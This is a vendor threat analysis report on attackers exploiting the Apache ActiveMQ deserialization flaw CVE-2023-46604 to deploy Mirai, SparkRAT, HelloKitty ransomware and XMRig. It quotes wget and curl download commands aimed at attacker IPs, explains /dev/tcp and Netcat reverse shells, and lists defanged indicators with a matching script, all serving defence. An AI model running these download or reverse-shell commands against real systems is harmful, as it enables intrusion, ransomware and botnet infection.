Cybereason Security Services Team
Cybereason Security Services issues Threat Analysis reports to inform readers about impactful threats. These reports investigate the threats and provide practical recommendations for protecting against them.
In this Threat Analysis Report, Cybereason Security Services examines an incident on a Linux server in which malicious shell (bash) commands were executed from a Java process running Apache ActiveMQ. ActiveMQ is an open-source message broker used to bridge communication between separate servers running different components and/or written in different languages.
This activity is strongly assessed to have leveraged a Remote Code Execution (RCE) vulnerability disclosed on October 27th as CVE-2023-46604. The observed shell executions include attempts to download additional payloads such as Mirai Botnet executables, HelloKitty Ransomware, SparkRAT executables, and coinminers including XMRig. The deployment methodologies are mostly automated; however, one initial foothold depends on an interactive session established through Netcat reverse shells.
Threat actors have been leveraging the exploit since October 11th, and given the variety of attacks seen on the machine, Cybereason believes the incident involves multiple threat actors.
Example Flow Of Messaging System
Apache ActiveMQ is an open-source, Java-based message broker that supports systems requiring asynchronous communication between server and client. ActiveMQ’s technology is often beneficial for a few reasons:
ActiveMQ currently has two versions: Classic and Artemis.
ActiveMQ also supports various protocols such as AMQP, MQTT, STOMP, and OpenWire.
This section provides an overview of CVE-2023-46604 and analyzes three initial footholds that abuse the exploit.
Exploitation of CVE-2023-46604 allows unauthenticated attackers to achieve RCE on machines running vulnerable versions of Apache ActiveMQ Artemis and Classic. The affected versions are as follows.
Example CVE-2023-46604 Exploit Flowchart
The vulnerability stems from insecure deserialization in the OpenWire protocol, which lets attackers manipulate serialized class types to execute arbitrary code. Exploitation uses the OpenWire command EXCEPTION_RESPONSE to abuse ClassPathXmlApplicationContext, a class in the Spring Framework bundled with ActiveMQ. ClassPathXmlApplicationContext loads XML application configuration files over the network via HTTP, and an attacker can embed arbitrary code in such an XML file to achieve RCE.
Example XML Application Configuration File
Example Exploitation Of CVE-2023-46604
Upon successful remote code execution on Apache ActiveMQ, the most commonly observed behavior was an attempt to download additional payloads using two separate download utilities: wget and curl.
Observed Download Activity After ActiveMQ Exploitation
Using both commands works seamlessly across different Unix systems, which drastically improves the chances of successfully downloading additional payloads. Below are some examples observed using this technique.
A Mirai botnet downloader was among the many download activities observed leveraging the ActiveMQ vulnerability to infect the device. The payload attempts to execute wget hxxp://82.115.220[.]81/bins/x86 and curl hxxp://82.115.220[.]81/bins/x86 to download the 32-bit ELF binary x86.
Execution Flow Of Observed Download Activity For Mirai Botnet
In the second example, the download activity led to the execution of SparkRAT, a cross-platform Remote Administration Tool (RAT) written in Golang.
Content Of Script linux.sh
The curl command downloads linux.sh from 45.32.120[.]181. linux.sh contains commands to download two separate binaries (l and l_x86), each written to the file .X12-unix. The script then marks .X12-unix world-readable, -writable and -executable (chmod 777) and runs it in the background with output redirected to /dev/null, discarding anything .X12-unix writes. The download activity is shown in the screenshot below.
Download Of l & l_x86 & Output To tmp Folder As .X12-unix
The two downloaded files could be different versions (32/64-bit) of the same program or could be needed to satisfy multiple dependencies for it to run. In this case, file l has a corrupt header that prevents execution, whilst l_x86 executes successfully. Downloading two files may indicate that the threat actor anticipated having to execute the payload regardless of CPU architecture.
Taking a deeper look at l_x86, the binary contains build configuration referencing what appears to be part of the SparkRAT configuration (Spark/client/config) as well as network activity using the built-in checkUpdate functionality.
SparkRAT Binary Build Information
Bash executes 1.sh and 2.sh, both hosted on a remote IP address (156.96.155[.]233).
Process tree of initial foothold related to CoinMiner
The script contains a list of instructions to download a file named Linux64. In this case, the download to the machine fails. The remote address (156.96.155[.]233) has been observed in the past distributing coinminers such as XMRig.
Content Of 1.sh Script Attempting To Download Linux64
In this instance, the script attempts to connect to a remote address (176.105.255[.]60) over port 8080 to fetch a file named YqA4eE7nQGlrOXB6snEZqA. Both the downloaded binary and the remote IP address have been associated with the ConnectBack family, a set of backdoors/reverse shells for Unix-based systems. ConnectBack simply opens a remote connection to the attacker, giving full access to and control of the infected system.
Command-Line Attempting To Download YqA4eE7nQGlrOXB6snEZqA
Overview of Initial Foothold Two
Unlike Initial Foothold One, the second methodology executes Base64-encoded commands. The decoded commands resemble the first methodology in that the threat actor relies on curl and wget to retrieve the necessary payloads. The execution flow eventually leads to the deployment and execution of HelloKitty Ransomware.
Process Tree Of Observed Initial Foothold Two
Base64 Encoded Bash Command
The Base64-encoded command consists of three sections responsible for the following:
The decoded Base64 commands consist of curl and wget invocations, both retrieving the payload down from the C2 server (172.245.16[.]125).
List of base64 decoded commands
Successful retrieval of the down content leads to the execution of conditional statements, as described in the next section.
HelloKitty Ransomware is a ransomware program that has been around since 2020 and has been used in several high-profile ransomware attacks. HelloKitty Ransomware supports not only Windows but also Linux, and it has targeted the VMware ESXi platform in the past. In early October 2023, BleepingComputer reported that the ransomware’s source code was leaked on a Russian-speaking hacking forum by a third-party threat actor, which may lead to other threat actors abusing the leaked HelloKitty Ransomware.
Process Tree Of Observed Initial Foothold Two
Once the curl or wget command retrieves the content of down, execution proceeds to a bash command consisting of if-else statements responsible for checking for and downloading the HelloKitty Ransomware binary ss64 from the C2 server (172.245.16[.]125).
Bash Execution Flowchart
Once the execution flow successfully downloads ss64 and saves the HelloKitty Ransomware Golang binary as .bash2, bash executes .bash2 through the "no hang up" command nohup. nohup prevents the process, .bash2 in this case, from being terminated when the shell session that started it ends.
The execution of .bash2 consists of the following steps:
.bash2 Stopping Database Services
Part Of HelloKitty Ransomware Ransom Note
Lateral Movement Attempt Via SSH
Initial Foothold Three consists of command execution to set up a reverse shell on the target machine. The threat actor uses the following two methods to gain a foothold in the environment:
It is important to note that this activity came after the execution of HelloKitty Ransomware. In this case, the threat actor first enumerates the machine and then deletes files that may be associated with the aforementioned activities before carrying out its own malicious activity.
Broad Overview Of Initial Foothold Three
Two distinct commands from 38.54.88[.]83 and 91.192.223[.]44 were observed following exploitation of the ActiveMQ vulnerability. The screenshot below illustrates a TCP reverse shell payload that combines two methods of creating a reverse shell.
The first command uses the bash shell's /dev/tcp/<hostname>/<port> file descriptor to open a socket to 38.54.88[.]83, which is listening on port 9099. Using a file descriptor to establish a reverse shell is a reliable method: it is portable, widely available across Unix systems, and does not depend on Telnet or NetCat packages being installed on the target Unix/Linux system.
Reverse Shell Command-Line Example 1
The second command uses the nc command (NetCat utility) with the nc -e bash option to create a reverse shell. Threat actors may combine the file descriptor and NetCat methods to increase their chance of successfully establishing a reverse shell, because depending on the version of NetCat, the nc -e option may be unsupported or disabled for security reasons.
Reverse Shell Command-Line Example 2
In this second example, the command attempts to create a reverse shell by opening a network connection to a target (91.192.223[.]44) over port 29123, with sh used to interact with the victim host. The command specifies file descriptor number 171, and in the exec 171<> command it associates descriptor 171 with a file opened for both reading and writing.
The observed interactive activities occurred over three distinct phases.
The interactive activity began with gaining insight into the file structure and user privileges using commands such as ls and whoami. From there, the threat actor used cat to display the contents of files, including files linked to HelloKitty Ransomware (.bash2, public1.txt, README1.html and encfile1.txt) and the command execution history (.bash_hi).
Viewing Files Using Cat Command
After enumeration, the threat actor attempted to start a default HTTP server with the python -m http.server command. The default web server listens on port 8000; however, the process ended immediately after execution.
Starting Up An HTTP Server
Soon after the HTTP server ended, the threat actor proceeded to install python3 and netstat. It is assessed that the actor may have encountered problems starting the HTTP server, such as:
Installing Python And Netstat
The threat actor also went on to delete files found during the enumeration phase.
Removing Files Found In The Enumeration Phase
In the final phase, the threat actor ran curl to download XMRig from transfer[.]sh/EewPaMsAUA/xmrig. As the file name suggests, the file is the XMRig coinminer.
Curl To Download XMRig Binary And XMRig Version From 38.54.88[.]83
transfer[.]sh is a public file-sharing service that allows users to upload and share files. It is a legitimate service that malicious actors leverage to host malicious files; in this case, it hosted an XMRig binary.
Transfer.Sh Hosting XMRig
Unlike the reverse shell activity from 38.54.88[.]83, the reverse shell activity from 91.192.223[.]44 only attempted to fetch a file named jQ, using both wget and curl, and saved it in the /var/tmp/java folder.
Downloading jQ From 91.192.223[.]44
The jQ payload has been identified as XMRigCC. XMRigCC is an XMRig-based coinminer with additional features such as remote control and monitoring functionality, giving the operator more control.
Type | Value | Comment
IP | 34.100.208[.]153 | IP address scanning ActiveMQ port
IP | 87.236.176[.]25 | IP address scanning ActiveMQ port
IP | 65.49.1[.]38 | IP address scanning ActiveMQ port
IP | 87.236.176[.]108 | IP address scanning ActiveMQ port
IP | 167.248.133[.]52 | IP address scanning ActiveMQ port
IP | 194.165.16[.]111 | IP address scanning ActiveMQ port
IP | 162.142.125[.]216 | IP address scanning ActiveMQ port
IP | 199.45.155[.]17 | IP address scanning ActiveMQ port
IP | 184.105.247[.]254 | IP address scanning ActiveMQ port
IP | 178.32.197[.]83 | IP address scanning ActiveMQ port
IP | 68.69.186[.]14 | IP address scanning ActiveMQ port
IP | 165.22.16[.]135 | IP address scanning ActiveMQ port
IP | 82.115.220[.]81 | C2 Server hosting Mirai Bot
IP | 45.32.120[.]181 | IP address for initial C2 connectivity (SparkRAT)
IP | 172.245.16[.]125 | IP address hosting HelloKitty Ransomware
IP | 156.96.155[.]233 | IP address hosting XMRig payload
IP | 27.102.128[.]152 | IP address hosting .ico files
IP | 38.54.88[.]83 | IP address used for reverse shell
SHA256 | 01c6c81abf1206caf6c4004bae8c4999624228c8b1ce7514503e4150c10c21b5 | XMRig payload
SHA256 | 6cb3d4d12357c63e654cf8c7062df0b07d22cf676307598bbf703de5258da519 | Decoy file downloaded prior to l_x86
SHA256 | cdc6e88a31e3a6f559b33b1249a5c4fa44f8c254b2437a5b6b06ff8c8c4d4c1d | 32-bit version of SparkRAT
SHA256 | c0cc0fcbbef380108d7522a778c0beb5e0ecc876bb7dd12bcbcea40ded39f321 | Mirai Bot
SHA256 | 7af5c37cc308a222f910d6a7b0759837f37e3270e22ce242a8b59ed4d7ec7ceb | HelloKitty Ransomware
URL | hxxps://transfer[.]sh/EewPaMsAUA/xmrig | URL redirecting to download XMRig payload
URL | hxxp://27.102.67[.]64:5678/fav.ico | URL downloading .ico file
URL | hxxp://91.192.223[.]44:9333/jQ | URL to download XMRig
URL | hxxp://172.245.16[.]125/.exec | URL for HelloKitty Ransomware payload
URL | hxxp://172.245.16[.]125/down | URL related to HelloKitty Ransomware
URL | hxxp://172.245.16[.]125/already | URL related to HelloKitty Ransomware
URL | hxxp://172.245.16[.]125/curlfinish | URL related to HelloKitty Ransomware
URL | hxxp://172.245.16[.]125/wgetfinish | URL related to HelloKitty Ransomware
URL | hxxp://45.32.120[.]181/linux.sh | URL for shell script which is responsible for downloading SparkRAT
URL | hxxp://156.96.155[.]233:8855/2.sh | URL for shell script
URL | hxxp://156.96.155[.]233:8855/1.sh | URL for shell script
URL | hxxp://27.102.128[.]152:8098/bit.ico | URL for ico file download
URL | hxxp://27.102.128[.]152:5678/fav.ico | URL for ico file download
URL | hxxp://82.115.220[.]81/bins/x86 | URL to fetch Mirai Bot payload
URL | hxxp://153.92.1[.]49:82/e.sh | URL for shell script
URL | hxxp://153.92.1[.]49:81/c.sh | URL for shell script
URL | hxxp://153.92.1[.]49:83/wk.sh | URL for shell script
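The indicators above are defanged (hxxp://, [.]) so they cannot be clicked or fetched by accident; before they can be searched for in proxy or firewall logs they need to be refanged and, for the URLs, the hostnames pulled out so that a different path on the same server still produces a hit. The script below is an added example, not Cybereason's tooling: it carries a subset of the table's own indicators, refangs them, and matches them against constructed Squid-style access log lines (the log format, the 10.0.0.0/8 client addresses and the 203.0.113.0/24 upstream addresses are assumptions, not observed data).

```python
"""Refang the defanged indicators from this report's IOC table and match them
against proxy-style log lines.  Added example, not Cybereason's tooling; the
IOC subset is copied from the report's table and the log lines are constructed
(10.0.0.0/8 and 203.0.113.0/24 are private/documentation ranges)."""
import re
from urllib.parse import urlsplit

# (type, value, comment) exactly as defanged in the report's IOC table.
DEFANGED_IOCS = [
    ("IP", "82.115.220[.]81", "C2 Server hosting Mirai Bot"),
    ("IP", "172.245.16[.]125", "IP address hosting HelloKitty Ransomware"),
    ("IP", "38.54.88[.]83", "IP address used for reverse shell"),
    ("URL", "hxxp://82.115.220[.]81/bins/x86", "URL to fetch Mirai Bot payload"),
    ("URL", "hxxp://172.245.16[.]125/down", "URL related to HelloKitty Ransomware"),
    ("URL", "hxxps://transfer[.]sh/EewPaMsAUA/xmrig", "URL redirecting to download XMRig payload"),
    ("URL", "hxxp://45.32.120[.]181/linux.sh", "URL for shell script which is responsible for downloading SparkRAT"),
]

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def refang(value):
    """Undo the defanging conventions used in the report (hxxp://, [.])."""
    value = value.replace("[.]", ".")
    return re.sub(r"^hxxp(s?)://", r"http\1://", value, flags=re.IGNORECASE)


def build_index(iocs):
    """Return ({url: comment}, {host_or_ip: comment}) for the refanged indicators.

    Hostnames are also taken from each URL so that a different path on the
    same server, or a CONNECT to it, still produces a hit."""
    urls, hosts = {}, {}
    for kind, value, comment in iocs:
        indicator = refang(value)
        if kind == "IP":
            hosts[indicator] = comment
        elif kind == "URL":
            urls[indicator] = comment
            host = urlsplit(indicator).hostname
            if host:
                hosts.setdefault(host, comment)
    return urls, hosts


def match_line(line, index):
    """Return [(indicator, comment), ...] for one log line, without duplicates."""
    urls, hosts = index
    hits, seen = [], set()
    for url in (u.rstrip(".,;)") for u in URL_RE.findall(line)):
        if url in urls and url not in seen:
            hits.append((url, urls[url]))
            seen.add(url)
    for host, comment in hosts.items():
        # Anchor on non-hostname characters so 82.115.220.81 never matches 182.115.220.810.
        if host not in seen and re.search(r"(?<![\w.-])" + re.escape(host) + r"(?![\w.-])", line):
            hits.append((host, comment))
            seen.add(host)
    return hits


def scan(lines, iocs=DEFANGED_IOCS):
    """Return (line_number, hits) for every line that matched an indicator."""
    index = build_index(iocs)
    results = []
    for number, line in enumerate(lines, 1):
        hits = match_line(line, index)
        if hits:
            results.append((number, hits))
    return results


# Constructed Squid-style access log lines.
SAMPLE_LOG = [
    "1698400001.101 10.0.0.15 TCP_MISS/200 GET http://82.115.220.81/bins/x86 - DIRECT/82.115.220.81 application/octet-stream",
    "1698400002.204 10.0.0.15 TCP_MISS/200 GET http://172.245.16.125/ss64 - DIRECT/172.245.16.125 application/octet-stream",
    "1698400003.377 10.0.0.15 TCP_TUNNEL/200 CONNECT transfer.sh:443 - DIRECT/203.0.113.9 -",
    "1698400004.512 10.0.0.22 TCP_MISS/200 GET http://deb.debian.org/debian/dists/bookworm/InRelease - DIRECT/203.0.113.40 text/plain",
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        for indicator, comment in hits:
            print(f"line {number}: {indicator} ({comment})")
```

The second sample line fetches a path (/ss64) that is not in the table but from a listed host, and the third is a TLS CONNECT with no URL at all; both are caught through the host index, which is why the URL list alone is not enough when hunting for this activity.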
The Cybereason Defense Platform can detect and prevent the post-exploitation activity observed in attacks related to Apache ActiveMQ exploitation. Cybereason recommends the following actions:
Tactic | Techniques / Sub-Techniques
TA0001: Initial Access | T1190 – Exploit Public-Facing Applications
TA0002: Execution | T1059 – Command and Scripting Interpreter
TA0003: Persistence | T1546.016 – Event Triggered Execution: Installer Packages
TA0005: Defense Evasion | T1027 – Obfuscated Files or Information
TA0010: Exfiltration | T1041 – Exfiltration Over C2 Channel
TA0010: Exfiltration | T1567 – Exfiltration Over Web Service
TA0011: Command and Control | T1071.001 – Application Layer Protocol: Web Protocols
TA0040: Impact | T1485 – Data Destruction
TA0040: Impact | T1486 – Data Encryption for Impact
TA0042: Resource Development | T1584.005 – Compromise Infrastructure: Botnet
Robin Plumer, Senior Security Analyst, Cybereason Global SOC
Robin Plumer is a Security Analyst with the Cybereason Global SOC team. He is engaged in analyzing and triaging malware operations and researching new and emerging threats. He earned his bachelor’s degree in cybersecurity management from Bournemouth University, UK.
KengWei Lin, Security Analyst, Cybereason Global SOC
KengWei Lin is a Security Analyst with the Cybereason Global SOC team. He is involved in the triage and analysis of malware alerts, proactive hunting, and proactive tuning of client environments. He is heavily invested in cybersecurity studies including malware analysis and testing.
Kotaro Ogino, Principal Security Analyst, Cybereason Global SOC
Kotaro Ogino is a Senior Security Analyst with the Cybereason Global SOC team. He is involved in threat hunting and Extended Detection and Response (XDR). Kotaro has a bachelor of science degree in information and computer science.
Cybereason is dedicated to teaming with Defenders to end cyber attacks from endpoints to the enterprise to everywhere. Learn more about Cybereason XDR powered by Google Chronicle, check out our Extended Detection and Response (XDR) Toolkit, or schedule a demo today to learn how your organization can benefit from an operation-centric approach to security.